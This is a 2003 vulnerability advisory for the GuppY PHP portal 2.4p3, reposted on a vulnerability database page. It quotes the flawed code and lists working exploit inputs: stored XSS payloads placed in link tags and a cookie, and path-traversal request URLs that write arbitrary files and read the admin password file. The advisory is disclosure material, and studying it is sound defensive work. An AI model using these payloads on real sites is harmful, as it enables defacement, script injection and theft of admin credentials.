Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

guppy24.txt

🗓️ 06 Oct 2003 00:00:00Reported by Frog ManType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

PHP versions 2.4p3 and lower have XSS and file access vulnerabilities; use patched version 2.4p4.

Code
`Informations :  
°°°°°°°°°°°°°  
Language : PHP  
Bugged Version : 2.4p3 (and less ?)  
Patched version : 2.4p4  
Website : http://www.freeguppy.org  
Problems :  
- Permanent XSS  
- Files Reading  
- Files Writing  
  
PHP Code/Location :  
°°°°°°°°°°°°°°°°°°°  
  
postguest.php :  
  
--------------------------------------------------------------------------------------------------------------------  
[...]  
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a   
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a   
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a   
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a   
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\"   
target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\"   
target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\"   
target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\"   
target=_blank>\\1</a>",$ptxt);  
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a   
href=\"\\1\" target=_blank>\\2</a>",$ptxt);  
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a   
href=\"\\1\" target=_blank>\\2</a>",$ptxt);  
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a   
href=\"\\1\" target=_blank>\\2</a>",$ptxt);  
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a   
href=\"\\1\" target=_blank>\\2</a>",$ptxt);  
[...]  
--------------------------------------------------------------------------------------------------------------------  
  
  
inc/includes.inc, inc/includes_IIS.inc :  
  
-------------------------------------------------------------------------------  
[...]  
$usercookie = "GuppYUser";  
$userprefs = array();  
if (!empty($HTTP_COOKIE_VARS[$usercookie])) {  
$userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);  
$userprefs[0] = strip_tags($userprefs[0]);  
$userprefs[1] = strip_tags($userprefs[1]);  
$userprefs[2] = strip_tags($userprefs[2]);  
$userprefs[3] = strip_tags($userprefs[3]);  
$userprefs[4] = strip_tags($userprefs[4]);  
$userprefs[5] = strip_tags($userprefs[5]);  
$userprefs[6] = strip_tags($userprefs[6],"<br>");  
if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) &   
empty($lng)) {  
$lng = $userprefs[0];  
}  
}  
[...]  
-------------------------------------------------------------------------------  
  
  
inc/functions.php :  
  
--------------------------------------------------------------  
[...]  
function ReadDBFields($fic) {  
global $connector;  
$DataDB = Array();  
if (FileDBExist($fic)) {  
$DataDB = file($fic);  
for ($i = 0; $i < count($DataDB); $i++) {  
$Fields[$i] = explode($connector,trim($DataDB[$i]));  
}  
}  
return $Fields;  
}  
  
function WriteDBFields($fic,$Fields) {  
global $connector;  
$fhandle = fopen($fic, "w");  
$DataDB = "";  
for ($i = 0; $i < count($Fields); $i++) {  
for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {  
$DataDB .= trim($Fields[$i][$j]).$connector;  
}  
$DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";  
}  
fputs($fhandle, $DataDB);  
fclose($fhandle);  
}  
[...]  
--------------------------------------------------------------  
  
  
tinymsg.php :  
  
-----------------------------------------------------------------------------------------------------------------------------  
[...]  
elseif ($action == 2) {  
[...]  
$dbmsg[0][0] = 0;  
$dbmsg[1][0] = $from;  
$dbmsg[1][1] = GetCurrentDateTime();  
$dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));  
WriteDBFields($userep.$to.$dbext,$dbmsg);  
}  
[...]  
elseif ($action == 3) {  
?>  
[...]  
$dbmsg = Array();  
if (FileDBExist($userep.$userprefs[1].$dbext)) {  
$dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);  
for ($i = 1; $i < count($dbmsg); $i++) {  
  
?>  
<p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7."   
".FormatDate($dbmsg[$i][1]); ?></p>  
<p><? echo $dbmsg[$i][2]; ?></p>  
<?  
if ($dbmsg[$i][0] != $web214) {  
?>  
<p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<?   
echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo   
$userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A>   
]</p>  
<?  
}  
?>  
<hr>  
[...]  
-----------------------------------------------------------------------------------------------------------------------------  
  
  
Exploits :  
°°°°°°°°  
  
- [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]  
  
- [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]  
  
  
- With a cookie named "GuppYUser" and with the value :  
fr||[NICK]||[MAIL]||LR||||on||<br   
style="background:url('javascript:[SCRIPT]')">, if you send a message   
(forum, guestbook,...) the javascript is executed.  
  
  
- http://[target]/tinymsg.php?action=2&from=Youpi!||Great   
!||rose||10000&msg=1&to=../poll  
will add a possibility to the current poll : "Youpi!" with the pink color   
("rose" in french) and a score of 10000.  
  
-   
http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2   
will write into http://[target]/tadaam.html the line :  
0\nyoupi1||[DATE+HEURE]||youpi2  
  
- The cookie named "GuppYUser" and with the value :  
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1  
sent to the page : http://[target]/tinymsg.php?action=3 will show the   
source of the file http://[target]/admin/mdp.php (containing the md5-crypted   
admin password).  
  
  
  
Patch/More Details :  
°°°°°°°°°°°°°°°°°°  
http://www.phpsecure.info  
  
  
  
  
frog-m@n  
  
_________________________________________________________________  
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Oct 2003 00:00Current
7.4High risk
Vulners AI Score7.4
php version 2.4p3xss vulnerabilityfile accesspatched version 2.4p4freeguppy.org
40